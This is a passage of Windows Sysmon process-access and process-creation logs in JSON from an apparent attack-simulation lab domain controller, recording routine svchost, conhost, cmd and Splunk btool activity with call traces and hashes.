07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2060,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-00103BEE0300}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-00103BEE0300}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2061,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.826\r\nProcessGuid: {41C8662E-1F77-5F25-0000-0010F7EE0300}\r\nProcessId: 4032\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1F77-5F25-0000-00103BEE0300}\r\nParentProcessId: 3984\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.826","ProcessGuid":"{41C8662E-1F77-5F25-0000-0010F7EE0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1F77-5F25-0000-00103BEE0300}","ParentProcessId":"3984","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2062,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F77-5F25-0000-00103BEE0300}\r\nSourceProcessId: 3984\r\nSourceThreadId: 4000\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010F7EE0300}\r\nTargetProcessId: 4032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F77-5F25-0000-00103BEE0300}","SourceProcessId":"3984","SourceThreadId":"4000","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010F7EE0300}","TargetProcessId":"4032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2063,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010F7EE0300}\r\nTargetProcessId: 4032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010F7EE0300}","TargetProcessId":"4032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2064,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2065,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2066,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2067,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2068,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 